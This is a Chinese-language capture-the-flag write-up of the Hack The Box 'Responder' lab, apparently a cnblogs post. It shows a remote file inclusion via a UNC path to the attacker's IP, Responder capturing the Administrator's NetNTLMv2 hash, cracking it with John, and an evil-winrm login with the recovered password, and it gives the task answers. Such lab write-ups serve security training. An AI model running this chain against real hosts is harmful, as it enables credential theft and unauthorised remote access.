首页 > 其他分享 >HTB-Responder

HTB-Responder

时间:2024-04-03 16:57:13浏览次数:18  
标签:文件 HTB .. Responder 包含 答案 使用

HTB-Responder

1.TASK1

KT7CdbPWAjOUmWviIvCPCkuZ3D14WIK00TrPvx5FtDs

问题:使用 IP 地址访问 Web 服务时,我们要重定向到的域是什么?

li5thvKj9jk-OnOZ211lQkp4Er9X_14bf348VTXBoVs

答案:unika.htb

2.TASK2

JhvBT7Js0_JCvj03JsIP3lXdERp5QpN9VyjkVk3DR-c

由于网站无法打开,需要在/etc/hosts里把域名加入

hn7IIY7qoOIhYYiwLfEnm-0GfdVtMAIdCRMcNeqvjJI

注意这里得用root帐号修改,否则无法修改

修改完成后可正常打开

QcE-7Qur-IvB-67Cak78Vpn-cGuKu1Mbf8BOC7aZ-nM

用Wappalyzer插件可以发现是PHP

VeBbFI9wsIiuPdpQQHzXHJaG4DHpZgBUKhAY6TwiTDc

或者可以用BP抓包发现,这里不做演示

3.TASK3

ob_l0-5sJHBzBHgVU-yC-dXbHMRIG-mI7NAJaBFfcuQ

问题:用于加载不同语言版本网页的 URL 参数的名称是什么?

当我们更改网站语言时,url上会显示page参数,将页面传入。说明此处可能存在文件包含漏洞

pdRATYl4wx003U4jc_RiXTTbogmg3jNdxsGJu7gnDnY

N5NHxGtvB9hpRsc0umCX6VAAxiKzjVO12MP-7Mef-cY

答案:page

4.TASK4

u14zN4VUr7z_20-7XRka8FOLOw1Zgupes8QcwJSZn1k

问题:page参数的以下哪个值是利用本地文件包含 (LFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

N8r2tPopQaHSmxbJGNQG9ShnEDRP9ZV4irDGPA-3obM

答案:../../. ./../../../../../windows/system32/drivers/etc/hosts

5.TASK5

Lr-4KD0ElqUM2ogsY3mwB9tNLO_mlHWsR87CBUko5tw

问题:page参数的以下哪个值是利用远程文件包含 (RFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

文件包含是指程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。

本地文件包含: 被包含的文件在服务器本地

远程文件包含: 被包含的文件在第三方服务器

文件包含漏洞: 通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,导致文件信息的泄露甚至注入了恶意代码

答案: //10.10.14.6/somefile

6.TASK6

qMb3sex6jpARoOIYk0kZo9d6PP9pBEaZnrFj6OZzz88

问题:NTLM 代表什么?

答案:New Technology LAN Manager

7.TASK7

6gHkqfdvq61_xv_qFIjr-ObmRKyJr09zVOv-tzwXie0

问题:我们在 Responder 实用程序中使用哪个标志来指定网络接口?

答案:-I

8.TASK8

02fgvBPG1hnaZj4mmKo_JSwKrFIvVIfiRdSS7Ojp7zA

问题:有几种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码,以查看它们中的任何一个是否生成相同的响应。一种这样的工具通常被称为“john”,但全名是什么?

答案:john the ripper

9.TASK9

bmCZM7tufntkPZTt3797Psu6M_EDeVg9lKeGTUzKiFY

问题:管理员用户的密码是什么?

首先启动responder并监听本地的tun0网卡,然后由于靶机存在RFI,因此可以远程访问本地的某个文件,使用responder拿到主机的administrator的哈希,然后使用john破解

使用responder监听本地tun0网卡

sudo responder -I tun0

根据题目给出的远程文件//10.10.14.6/somefile,把地址改为自己机器的地址,进行访问

QXqVhNuSSrbruZCcygXkx98V3CQyTkvkFgd_hNmsVNk

得到一串hash值

AYydrEglrUY_cTGwF7W8O--SXgYJHRI3AK5JN7nqqyM

使用john工具进行破解

BZ578QE8ZZmBJjKBnSdPbd5AAfjFH0UkdSpTH6AkF9w

答案:badminton

PS:花了22分钟也是醉了。。

10.TASK10

n4C546dTJ8CmSQFn_cEq5fBs3SSe805yQ0BP1qGRANM

问题:我们将使用 Windows 服务(即在盒子上运行)使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?

WinRM(Windows Remote Management)windows远程管理,这个是基于powershell的功能

检测 WinRM 是否可用的最简单方法是查看端口是否打开, 如果这两个端口有一个打开:

5985/tcp (HTTP)

5986/tcp (HTTPS)

说明WinRM已配置,可以尝试进入远程会话

答案:5985

11.SUBMIT FLAG

使用evil-winrm对目标进行连接

evil-winrm -i 10.129.125.204 -u Administrator -p badminton

连接成功

使用dir可以查看当前目录下存在哪些文件

使用cd .. 返回上一级目录

e_n6rwKsA81G_51Y0QjEAWcSJ7eyaeAiineSyoxdUqU

最后在mike的Desktop目录下找到flag文件

cXPn2eb8oD9qd7TX4MReasuAzkuV16xmrbbSJDs2inc

cCAkm_xBSiYWrdgl9fUpYlot5lyt2tIzHCU5dtRwNE4

标签:文件,HTB,..,Responder,包含,答案,使用
From: https://www.cnblogs.com/fishjumpriver/p/18113053

相关文章

  • HTB-Sequel(SQL)
    HTB-Sequel(SQL)1.TASK1问题:在我们的扫描里,哪个端口运行着我们找到的mysql?nmap-Pn-T4-sV10.129.119.235答案:33062.TASK2问题:目标正在运行哪个社区开发的MySQL版本?nmap-Pn-A-p330610.129.119.235答案:MariaDB3.TASK3问题:我们需要使用哪个参数来指定MySQ......
  • HTB Perfection-wp 基于ruby的SSTI注入、密码爆破工具hashcat的使用、反弹shell的编码
    一进来发现这个页面,估计突破点就是在这里了 当然也可走一下固定的流程,nmap扫一下、dir爆破一下。这里不太像是sql的注入点(并不是查询功能),就不用sql试了。首先第一反应时看到WEBrick模板框架,考虑有没有版本漏洞,但是在几个CVE数据库搜一下都没有对应版本的漏洞。那么走一下正常......
  • jQuery灯箱插件lightBox使用方法
    原文链接:https://blog.csdn.net/ououou123456789/article/details/6015122https://jingyan.baidu.com/article/9c69d48f992b1b13c9024e3d.html“Lightbox”是一个别致且易用的图片显示效果,它可以使图片直接呈现在当前页面之上而不用转到新的窗口。类似于WinXP操作系统的注销/关......
  • Fiddler(6)AutoResponder,重定向
    Fiddler最实用的功能,它可以抓取在线页面保存到本地进行调试,大大减少了在线调试的困难,可以让我们修改服务器端返回的数据 Enablerules 启用规则Unmatchedrequestspassthrough 没有匹配到的请求予以通过(建议开启;没开启时,规则匹配外的请求将失败,报HTTP404错误)Enabl......
  • HTB打靶——Bizness
    #简述关于HacktheBox的Bizness机器渗透过程。靶机:10.10.11.252攻击机(Kali):10.10.14.39#过程1、连接OpenVPN后,使用nmap对靶机进行端口扫描:nmap-A10.10.11.2522、扫描得到的结果发现该靶机开启了**22、80、443**端口,其中根据信息显示,该靶机运行这一个nginx的web服务器,同时......
  • 【HTB】Sherlocks Recollection 蓝队 easy
    工具:volatility2.6(2比3完善) https://www.volatilityfoundation.org/25kali下载volatility2.6#下载pip2sudowgethttps://bootstrap.pypa.io/pip/2.7/get-pip.pysudopython2get-pip.py#pycrypto、distorm3所需依赖sudopython2-mpipinstall-Usetuptoolswh......
  • 【HTB】Sherlocks Ore 蓝队 medium
    task1问题:哪个CVE导致了EC2的最初泄露?#文件放在~/htb/Ore目录cdusr/share/grafanals-lacatVERSION #8.2.0搜索grafana8.2.0exploit可得CVE-2021-43798答案:CVE-2021-43798task2问题:请详细说明针对我们组织的威胁行为者(TA)使用的所有恶意IP地址......
  • HTB_pwn_pet_companion_exp
    frompwnimport*context.log_level='debug'elf=ELF('./pet_companion')io=remote('94.237.54.152',51111)padding=72pop_rdi=0x0000000000400743#:poprdi;retpop_rsi=0x0000000000400741#:poprsi;retpayload=b......
  • HTB-Fawn(FTP)
    HTB-Fawn(FTP)1.TASK1问题:3个字母的首字母缩写词FTP代表什么?FTP是文件传输协议的简写。FTP文件传输协议(FileTransferProtocol)是用于在网络上进行文件传输的一套标准协议,它工作在OSI模型的第七层,TCP模型的第四层—————应用层,FTP使用TCP传输而不是UDP传输,它有两......
  • HTB/鳄鱼
    继续下一关!还是免费的一关这一关包含了1.ftp匿名登录,拿到用户名和密码文件2.使用gobuster爆破字目录/文件这里访问login.php用之前拿到的用户名和密码登录就可以拿到flag了......